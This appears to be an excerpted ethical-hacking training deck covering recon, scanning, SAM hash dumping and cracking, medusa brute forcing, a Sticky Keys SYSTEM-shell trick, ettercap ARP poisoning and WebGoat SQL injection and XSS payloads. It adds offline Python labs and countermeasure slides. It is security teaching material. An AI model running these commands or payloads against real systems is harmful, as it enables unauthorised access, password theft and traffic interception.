2. •First, SSH needs to be installed or updated (apt-get applies to Debian-based systems such as Kali/Ubuntu; on Red Hat/CentOS use yum install openssh-server)
# apt-get install openssh-server
# service ssh start
Verify that the server is up and listening using the “netstat” command
# netstat -antp | grep ssh
Now connect with “putty.exe” to your Linux SSH servers (Kali / Ubuntu / Red Hat /
CentOS)
SSHD | SSH Server
9. Active Recon Resources
•inurl:ftp "password" filetype:xls
•site:example.com inurl:ftp "password" filetype:xls
You should also be performing focused searches that locate all major document types
such as .pdf, .doc, .txt, .xls
10. Active Recon Resources
•dig (Domain Information Groper), an alternative to nslookup
# dig example.com
# dig +qr example.com any (prints the query and every record type; use "dig example.com NS" to list the name servers, since many servers now refuse ANY queries)
Zone Transfer using DIG (only succeeds if the name server allows transfers to your address)
# dig @ns1.example.com example.com axfr
Listing the DNS server version (usually restricted by administrators)
# dig +nocmd txt chaos VERSION.BIND @ns1.example.com +noall +answer
Reverse DNS Lookup
# dig -x ipaddress
Tracing the Path
# dig +trace example.com
11. Active Recon Resources
•Fierce (DNS brute forcing with fierce)
Go to
# cd /pentest/enumeration/dns/fierce
# ./fierce -dns example.com
12. Active Recon Resources
•Metagoofil (a powerful metadata gathering tool)
BackTrack has the Metagoofil Blackhat Arsenal Edition installed by default.
Open up a terminal and type the following:
# cd /pentest/enumeration/google/metagoofil
# ./metagoofil.py -h
# ./metagoofil.py -d example.com -t doc,pdf -l 200 -n 50 -o /mnt -f results.html
14. Countermeasures
•Dispose of trash securely (shred documents)
•Configure routers/IDS/firewalls to allow only the required apps/ports/rules
•Refuse malicious traffic
•Lock down ports & protocols
•Avoid leaking web service information (banners, version strings, verbose error pages)
•Disallow sensitive directories
•Evaluate your services before exposing them publicly
•When asked for information, give only limited and specific answers (social engineering defence)
16. •What is Scanning
•CEH Scanning Methodology
•Scanning Terms
•3-way handshake
Let’s Get Started
17. • Port scanning is the process of checking for open TCP or UDP
ports on a remote machine. Please note that unauthorised port scanning is illegal
in many jurisdictions and should not be performed outside the labs. This
is the active probing phase, which involves more direct interaction
with the target servers. It is vital that we understand the implications
of port scanning, as well as the impact that certain port scans can
have on a network.
•Scanning refers to a set of procedures for identifying hosts, ports
and services in a network
•Scanning is one step of intelligence gathering for an attacker to
create a profile of the target organization
What is Scanning
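Added example (not from the original slides): a TCP connect() scanner in Python, the simplest form of the port scan described above. A connect scan completes the full 3-way handshake, so an open port accepts the connection, a closed port answers RST (seen as ConnectionRefusedError) and a port silently dropped by a firewall times out. A throw-away service on the loopback interface stands in for the target; the banner it sends is constructed.

```python
import socket
import threading

# Added example, not from the slides: TCP connect() scan plus banner grab.
# connect() completes the full three-way handshake (SYN, SYN/ACK, ACK).

def scan_port(host, port, timeout=1.0):
    """Return 'open', 'closed' or 'filtered' for one TCP port on host."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))          # handshake completed: port is open
            return "open"
        except ConnectionRefusedError:
            return "closed"                  # RST came back
        except (socket.timeout, OSError):
            return "filtered"                # no answer: dropped by a firewall

def grab_banner(host, port, timeout=1.0, nbytes=128):
    """Read whatever the service sends first (the banner grabbing step)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        s.connect((host, port))
        try:
            return s.recv(nbytes).decode("ascii", "replace").strip()
        except socket.timeout:
            return ""

def scan_ports(host, ports):
    """Scan several ports and return {port: state}."""
    return {p: scan_port(host, p) for p in ports}

# --- constructed lab target so the example runs offline ------------------
def start_fake_service(banner=b"SSH-2.0-LabServer\r\n"):
    """Listen on a random loopback port and send a banner to each client."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return                      # listener closed
            with conn:
                try:
                    conn.sendall(banner)
                except OSError:
                    pass                    # client already gone (scan only)

    threading.Thread(target=serve, daemon=True).start()
    return srv

def closed_port():
    """Pick a loopback port that is currently closed (bind, read, release)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port

if __name__ == "__main__":
    svc = start_fake_service()
    open_p = svc.getsockname()[1]
    print(scan_ports("127.0.0.1", [open_p, closed_port()]))
    print(grab_banner("127.0.0.1", open_p))
    svc.close()
```

The difference between "closed" and "filtered" is the practical point: a closed port still tells you the host is up, while a filtered port tells you a packet filter sits in the path, which is what the countermeasure slides later aim for.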
18. •Checking Live Systems
•Check Open Ports
•Banner Grabbing
•Prepare Proxies
•Scan for Vulnerabilities
•Draw Network Diagram
Scanning Methodology
26. •Configure firewall and IDS rules to detect and block probes/scans
•Block unwanted ports at the firewall
•Hide sensitive information from public view
•Use custom rules set to lock down the network
•Filter inbound ICMP message types and all outbound ICMP type 3 unreachable
messages at border routers and firewalls
•Ensure that routing and filtering mechanisms cannot be bypassed using specific
source ports or source-routing techniques
•Understand the network configuration and its accessible ports by launching TCP
and UDP port scans along with ICMP probes against your own IP address space
Countermeasures
27. •If a commercial firewall is in use, ensure that:
•The latest service pack is installed
•The Anti-spoofing rules have been correctly defined
•Fastmode services are not used in Check Point Firewall-1 environments
Countermeasures
30. Enumeration is defined as the process of extracting user names, machine
names, network resources, shares, and services from a system
Enumeration techniques are conducted in an intranet (LAN) environment
The type of information enumerated by intruders:
Network resources and shares
Users and groups
Applications and banners
Auditing settings
What is Enumeration
34. •NetBIOS Enumeration: use strong passwords
•SNMP Enumeration: use SNMPv3, which supports authentication and encryption, and change default community strings
•LDAP Enumeration: where anonymous queries are allowed by default, restrict them to
authorized users only
Countermeasures
37. Password cracking techniques
Dictionary Attacks - A dictionary file is loaded into the cracking application,
which runs it against user accounts
Brute Forcing Attacks - The program tries every combination of characters
until the password is found
Hybrid Attack – It works like a dictionary attack, but adds numbers and
symbols to the words from the dictionary and tries those as well
Syllable Attack – A combination of the brute force attack and the
dictionary attack
Rule-Based Attack – Used when the attacker has some
information about the password (length, character classes, known fragments)
38. Understanding different types of passwords
Only letters - HIJKLMNO
Only numbers - 758904
Only special characters - $@$!0
Letters and numbers - ax15oog
Letters and special characters - m@roon$
Only numbers and special characters - @#47$
Letters, numbers, and special characters - E1n$8$
41. Password Cracking Tools (2000 / XP / 2003 / Vista / 7 / 2008)
-Offline NT password re-setter
-Cain & Abel
-Ettercap (MITM) Back Track 5
-Pwdump6 / Fgdump (dump hashes)
-L0phtCrack (LC6)
-Ophcrack (rainbow tables) http://ophcrack.sourceforge.net
-Elcomsoft Advanced Password Recovery Bundle
-Back Track 5 – dump hashes and crack
42. Back Track 5 – Dump Windows hashes and crack
1) Identify the Windows NTFS partition ( fdisk -l )
2) Create a mount point ( mkdir /mnt/win )
3) Mount the Windows partition ( mount /dev/sda1 /mnt/win )
4) bkhive /mnt/win/WINDOWS/system32/config/system syskey.txt (extracts the SYSKEY boot key)
5) samdump2 /mnt/win/WINDOWS/system32/config/SAM syskey.txt >
hashes.txt
6) nano or vi editor to check the contents (optional)
7) john hashes.txt -w:/dicfolder/wordfile.txt (add --format=nt to crack the NT hashes; john otherwise prefers the LM hashes when they are present)
Password cracked
43. Password cracking tools (2000 / XP / 2003 / Vista / 7 / 2008)
- THC-Hydra (back track 5)
-Medusa (back track 5)
# medusa -h 172.19.0.1 -u "admin" -P wordlist.txt -M http
-h the host you want to attack
-u the username you want to try. If there is no username use ""
-P the wordlist you want to use
-M the module you want to use
Here is the list of modules included with Back Track 5 & 5R1 Final:
# ls /usr/local/lib/medusa/modules/
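Added example (not from the slides and not medusa's own code): the online guessing that the medusa command above performs against an HTTP Basic-auth login, written in plain Python. A throw-away target server on the loopback interface plays the host; its credentials and the wordlist are constructed. The last function shows what the target's side looks like, which is the signal the "monitor server logs for brute-force attacks" countermeasure relies on.

```python
import base64
import http.server
import threading
import urllib.error
import urllib.request

# Added example, not from the slides: online password guessing against HTTP Basic
# auth (what "medusa -M http" does). Credentials and wordlist are constructed.

TARGET_USER, TARGET_PASS = "admin", "winter2012"

def _expected_header():
    return "Basic " + base64.b64encode(f"{TARGET_USER}:{TARGET_PASS}".encode()).decode()

class _BasicAuthHandler(http.server.BaseHTTPRequestHandler):
    attempts = []                                  # every Authorization header seen

    def do_GET(self):
        got = self.headers.get("Authorization", "")
        _BasicAuthHandler.attempts.append(got)
        if got == _expected_header():
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"welcome\n")
        else:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="lab"')
            self.end_headers()

    def log_message(self, *args):                  # keep the console quiet
        pass

def start_target():
    """Start the lab target on 127.0.0.1:<random port>; returns (server, base_url)."""
    srv = http.server.HTTPServer(("127.0.0.1", 0), _BasicAuthHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}/"

def try_login(url, user, password, timeout=3):
    """One guess: True on HTTP 200, False on 401, raise on anything else."""
    req = urllib.request.Request(url)
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req.add_header("Authorization", "Basic " + token)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.getcode() == 200
    except urllib.error.HTTPError as err:
        if err.code == 401:
            return False
        raise

def brute_force(url, user, wordlist):
    """Equivalent of: medusa -h <host> -u <user> -P wordlist.txt -M http
    Returns (password, attempts_used) or (None, attempts_used)."""
    for n, guess in enumerate(wordlist, 1):
        if try_login(url, user, guess):
            return guess, n
    return None, len(wordlist)

def failed_logins_seen():
    """Defender's view: number of failed attempts the target recorded."""
    return sum(1 for a in _BasicAuthHandler.attempts if a != _expected_header())

if __name__ == "__main__":
    srv, url = start_target()
    wordlist = ["password", "admin", "123456", "letmein", "winter2012", "summer2012"]
    print(brute_force(url, "admin", wordlist))
    print("failed attempts recorded by the target:", failed_logins_seen())
    srv.shutdown()
```

A run of consecutive 401s for one account from one source address within seconds is exactly the pattern to alert on or to lock out; medusa's -t option (parallel connections) only makes that burst louder.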
44. Password cracking tools (2000 / XP / 2003 / Vista / 7 / 2008)
-John the Ripper
-Recover Keys
-Windows Password Crackers
-Proactive System Password Recovery
-Password Unlocker Bundle
-Windows Password Reset Professional
-Windows Password Reset Standard
-Windows Password Unlocker
-Win Password
-Passware Kit Enterprise
-RockXP
-Passwords Pro
-LSA Secret View
-LCP
45. Stealing Passwords Using a USB Drive
Insert a USB drive into the victim’s computer and extract the necessary information
46. Microsoft Authentication
SAM Database: Windows stores user passwords in the Security Accounts Manager
database (SAM), or in the Active Directory database in domains. Passwords are never
stored in clear text; they are hashed and the results are stored in the SAM.
NTLM Authentication: The NTLM authentication protocol family consists of two
authentication protocols, NTLM and LM. These protocols
use different hashing methods (the NT hash and the much weaker LM hash) to store a user’s password in the SAM
database; LM hash storage should be disabled.
Kerberos: Microsoft has upgraded its default domain authentication protocol to Kerberos, a
considerably more secure option than NTLM
More info
http://en.wikipedia.org/w/index.php?title=Special%3ASearch&search=Ntlm+hash
48. Algorithms – well-defined instructions for calculating the functions
Kerberos – (2000 / 2003 / Vista / 7 / 2008)
Strongest security, but it is used only for Active Directory domain logons (Windows 2000 Server and above); local logons and logons by IP address still fall back to NTLM
49. Microsoft Remote Desktop Service – BSoD a.k.a. crashing the host (XP, 2003, 7, 2008 R2)
Hands-on with RDPKill
50. Password Cracking Countermeasures
-Strong passwords should be enforced to protect against password
cracking.
-Systems should enforce passwords of at least 8–12 alphanumeric characters.
-Password length & complexity requirements should be set
-To protect the password hashes stored on the
server against offline cracking, physically isolate and protect the server.
-The system administrator can use the SYSKEY utility in Windows to further protect
hashes stored on the server’s hard disk.
-The server logs should also be monitored for brute-force attacks on user
accounts.
51. Password Cracking Countermeasures
System administrators can implement the following security precautions to decrease
the effectiveness of a brute-force password-cracking attempt:
-Never leave a default password.
-Never use a password that can be found in a dictionary.
-Never use a password related to the hostname, domain name, or anything else that
can be found with Whois.
-Never use a password related to your hobbies, pets, relatives, or date of birth.
-As a last resort, use a passphrase of more than 21 characters
-Passwords should expire after a certain amount of time so that users are forced to
change them.
52. Escalating Privileges
Escalating privileges basically means adding more rights or permissions to a user
account. Put simply, escalating privileges turns a regular user account into an
administrator account
53. Escalating Privileges
Sticky Keys – works on all Windows versions covered here
Sticky Keys is an accessibility feature in Windows OS to aid users who have physical
disabilities. Press the Shift key 5 times at the logon screen and the Sticky Keys dialog shows
up
The program that launches Sticky Keys is located at
c:\windows\system32\sethc.exe
If we replace sethc.exe with cmd.exe (this needs administrative or offline access to the disk,
for example from a boot CD as in the hash-dumping procedure above) and then press Shift 5 times at the logon
screen, we get a command prompt running as SYSTEM before anyone has logged on
54. How to Defend against Privilege Escalation?
-Use encryption techniques to protect sensitive data
-Restrict the interactive logon privilege
-Run users and applications with the least privilege
-Implement multi-factor authentication and authorization
-Patch the system regularly
-Run services as unprivileged accounts
55. Keyloggers
-Keystroke loggers are programs or hardware devices that monitor each keystroke as a
user types on a keyboard, and log it to a file or transmit it to a remote location
-Hardware keyloggers are placed between the keyboard and the computer; software keyloggers hook the keyboard input path inside the operating system
-Legitimate applications for keyloggers include office and industrial settings, to
monitor employees’ computer activities, and home environments where parents
monitor their children's activity
57. Keyloggers
Actual Spy (monitoring systems)
www.actualspy.com
-Designed for hidden computer monitoring
-Actual Spy is capable of catching all keystrokes, capturing the screen, logging the
programs being run and closed, and monitoring the clipboard contents
Features
-Log all keystrokes
-Makes screenshots within the specified time interval
-Saves the applications running and closing
-Watches clipboard contents
-Records all print activity
-Records disk changes
-Records internet connections
-Records all websites visited
61. How to hide files – NTFS Alternate Data Stream (ADS)
-NTFS Alternate Data Streams (ADS) are additional named data streams attached to a file; Windows
itself uses them for hidden metadata such as document summary properties (author name,
word count)
-ADS lets data be attached to existing files without changing or altering their
functionality, their reported size, or how they appear in the file browsing utilities
-ADS allows an attacker to hide malicious code on a breached system and execute
it without being noticed by the user
62. How to hide files – NTFS Alternate Data Stream (ADS)
How to create
Notepad is a stream-aware application
Launch C:\> notepad myfile.txt:private.txt
Click Yes to create the new file, write some lines, then save
View the file size: it is unchanged (dir /r lists the hidden stream)
To modify the stream data, open it the same way:
notepad myfile.txt:private.txt
63. Steganography Technologies
Image Steganography
In image steganography, the information is hidden in image files of different formats
such as .PNG, .JPG, .BMP, etc.
Image steganography tools replace redundant bits of image data (typically the least significant bits of the pixel values) with the message
in such a way that the effect cannot be detected by human eyes
Download Images Steganography Tools
http://www.stegoarchive.com
Demo - Image Hide
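Added example (not ImageHide and not from the slide): least-significant-bit embedding and extraction on a raw 8-bit-per-sample pixel buffer, the redundant-bit replacement the slide describes. No image library is involved; the "cover image" is a constructed 64x64 RGB gradient. The last function is the flip side for a forensic analyst: LSB embedding leaves a statistical trace even though the eye sees nothing.

```python
# Added example, not from the slides: LSB image steganography on a raw pixel
# buffer. The cover image below is constructed (a smooth gradient, all LSBs 0).

def embed(pixels: bytes, message: bytes) -> bytes:
    """Hide message in the LSB of successive samples, after a 32-bit length prefix."""
    payload = len(message).to_bytes(4, "big") + message
    bits = [(byte >> (7 - i)) & 1 for byte in payload for i in range(8)]
    if len(bits) > len(pixels):
        raise ValueError("cover image too small for this message")
    out = bytearray(pixels)
    for idx, bit in enumerate(bits):
        out[idx] = (out[idx] & 0xFE) | bit           # touch only the lowest bit
    return bytes(out)

def extract(pixels: bytes) -> bytes:
    """Recover the message: length from the first 32 LSBs, then the body."""
    def read_bytes(count, start):
        data = bytearray()
        for b in range(count):
            value = 0
            for i in range(8):
                value = (value << 1) | (pixels[start + b * 8 + i] & 1)
            data.append(value)
        return bytes(data)
    length = int.from_bytes(read_bytes(4, 0), "big")
    return read_bytes(length, 32)

def max_sample_change(cover: bytes, stego: bytes) -> int:
    """Largest per-sample difference: LSB embedding never moves a sample by more than 1."""
    return max(abs(a - b) for a, b in zip(cover, stego))

def lsb_ratio(pixels: bytes) -> float:
    """Fraction of samples with LSB set. Smooth image regions have skewed LSBs;
    an embedded message drags the ratio toward 0.5, a simple detection signal."""
    return sum(p & 1 for p in pixels) / len(pixels)

# Constructed 64x64 RGB cover: horizontal gradient with even values only.
COVER = bytes((x * 4) & 0xFF for y in range(64) for x in range(64) for _ in range(3))

if __name__ == "__main__":
    stego = embed(COVER, b"meet at midnight")
    print(extract(stego))
    print("max change per sample:", max_sample_change(COVER, stego))
    print("LSB ratio cover/stego:", lsb_ratio(COVER), lsb_ratio(stego))
```

Real tools spread the bits over the image (often with a key-derived order) and work on PNG/BMP pixel data rather than JPEG, whose lossy compression would destroy plain LSB payloads.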
67. Covering Your Tracks
-Once intruders have successfully gained administrator access on a system, they
try to cover their tracks to avoid detection
-When all the information of interest has been taken from the target, the
intruder installs several backdoors so that he or she can gain easy access in the
future
68. Covering Your Tracks
Why Cover Tracks?
-So they can attack again
-So they avoid detection
-So they can install backdoors for future access
Tool:
CCleaner
69. Ettercap Packet Sniffing
ettercap -T -M arp -i eth0 /192.168.1.8/ /192.168.1.1/ (one computer to the router)
ettercap -T -M arp -i eth0 // // (all computers)
ettercap -T -M arp -i eth0 // // -w file.cap (all computers, with the captured data saved to a file)
Press q (or Ctrl+C) to quit; ettercap then re-ARPs the victims to restore their tables
cat file.cap | grep -a http
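Added example (not from the slides, not ettercap's code): the frames that ettercap -M arp puts on the wire, built with struct, and the check a defender runs over a capture to catch them. An ARP "is-at" reply that claims the router's IP with a different MAC is the whole attack; a table of IP-to-MAC bindings that notices the change is the whole detection. MAC and IP values are constructed; nothing is sent.

```python
import struct

# Added example, not from the slides: ARP poisoning frames and their detection.
# Addresses below are constructed lab values.

ETH_TYPE_ARP = 0x0806
ARP_REPLY = 2

def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))

def ip_bytes(ip):
    return bytes(int(o) for o in ip.split("."))

def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet + ARP 'is-at' frame: what ettercap sends to each poisoned side."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_TYPE_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)   # Ethernet, IPv4, 6, 4, reply
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp

def parse_arp(frame):
    """Return (opcode, sender_mac, sender_ip), or None if the frame is not ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_TYPE_ARP:
        return None
    opcode = struct.unpack("!H", frame[20:22])[0]
    smac = ":".join(f"{b:02x}" for b in frame[22:28])
    sip = ".".join(str(b) for b in frame[28:32])
    return opcode, smac, sip

def detect_poisoning(frames):
    """Replay frames against an IP->MAC table; alert when a known IP changes MAC.
    Returns (final_table, alerts)."""
    table, alerts = {}, []
    for frame in frames:
        parsed = parse_arp(frame)
        if not parsed or parsed[0] != ARP_REPLY:
            continue
        _, mac, ip = parsed
        if ip in table and table[ip] != mac:
            alerts.append(f"{ip} moved from {table[ip]} to {mac}")
        table[ip] = mac
    return table, alerts

# Constructed lab: router .1, victim .8, attacker's machine with its own MAC.
ROUTER, ROUTER_MAC = "192.168.1.1", "00:11:22:33:44:01"
VICTIM, VICTIM_MAC = "192.168.1.8", "00:11:22:33:44:08"
ATTACKER_MAC = "de:ad:be:ef:00:66"

CAPTURE = [
    build_arp_reply(ROUTER_MAC, ROUTER, VICTIM_MAC, VICTIM),    # legitimate
    build_arp_reply(VICTIM_MAC, VICTIM, ROUTER_MAC, ROUTER),    # legitimate
    build_arp_reply(ATTACKER_MAC, ROUTER, VICTIM_MAC, VICTIM),  # to victim: "router is-at attacker"
    build_arp_reply(ATTACKER_MAC, VICTIM, ROUTER_MAC, ROUTER),  # to router: "victim is-at attacker"
]

if __name__ == "__main__":
    table, alerts = detect_poisoning(CAPTURE)
    print(table)
    for a in alerts:
        print("ALERT:", a)
```

This is the same logic arpwatch applies on a live interface; static ARP entries for the gateway, or dynamic ARP inspection on the switch, stop the poisoned replies from taking effect at all.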
74. (1) Install WebGoat and run it
(2) Install the Tamper Data add-on in Firefox
(3) Run Burp Suite
In OWASP>
Access control flaws > Bypass a Path Based Access Control Scheme >
/../../../../conf/server.xml
Injection Flaws > String SQL Injection
X' or 'a'='a
Improper Error Handling
Parameter Tampering
OWASP – WebGoat
WebGoat OWASP Web/SQL/App Hacking Practitioner
75. XSS – Cross Site Scripting & SQL
Stored XSS
Stored XSS revisited
Reflected XSS (search staff)
"><script>alert("Teste")</script>
String SQL injection (Smith' or 'a'='a) with Tamper Data
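Added example (not WebGoat's code): the String SQL Injection lesson reduced to a local SQLite table, so the payloads from the two slides above can be tried offline. It shows the concatenated query the Smith' or 'a'='a payload breaks out of, the parameterised query that treats the same input as data, and the output encoding that neutralises the reflected XSS payload. The employee rows are constructed.

```python
import html
import sqlite3

# Added example, not WebGoat's code: string SQL injection and its fix, plus
# output encoding for the reflected XSS payload. Table contents are constructed.

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE employees (userid INTEGER, first TEXT, last TEXT, salary INTEGER)")
    db.executemany("INSERT INTO employees VALUES (?, ?, ?, ?)",
                   [(101, "John", "Smith", 50000),
                    (102, "Jane", "Snow", 62000),
                    (103, "Larry", "Stooge", 55000)])
    return db

def lookup_vulnerable(db, last_name):
    """String concatenation, as in the lesson: the quote in the input becomes SQL syntax."""
    sql = "SELECT last, salary FROM employees WHERE last = '" + last_name + "'"
    return db.execute(sql).fetchall()

def lookup_safe(db, last_name):
    """Same query with a bound parameter: the input can only ever be a value."""
    return db.execute("SELECT last, salary FROM employees WHERE last = ?",
                      (last_name,)).fetchall()

def render_search_echo(term):
    """Reflected XSS fix: the search term is HTML-encoded before it is put into the page."""
    return '<input value="' + html.escape(term, quote=True) + '">'

PAYLOAD = "Smith' or 'a'='a"                          # String SQL Injection lesson
XSS_PAYLOAD = '"><script>alert("Teste")</script>'    # Reflected XSS lesson

if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "Smith"))        # one row
    print(lookup_vulnerable(db, PAYLOAD))        # every row: WHERE ... or 'a'='a' is always true
    print(lookup_safe(db, PAYLOAD))              # no rows: nobody is literally named that
    print(render_search_echo(XSS_PAYLOAD))       # the payload comes back as inert text
```

Tamper Data and Burp only matter for delivering the payload past client-side checks; the server-side fix is the bound parameter, and the same rule applies to the stored XSS lessons, where encoding must happen when the stored value is rendered.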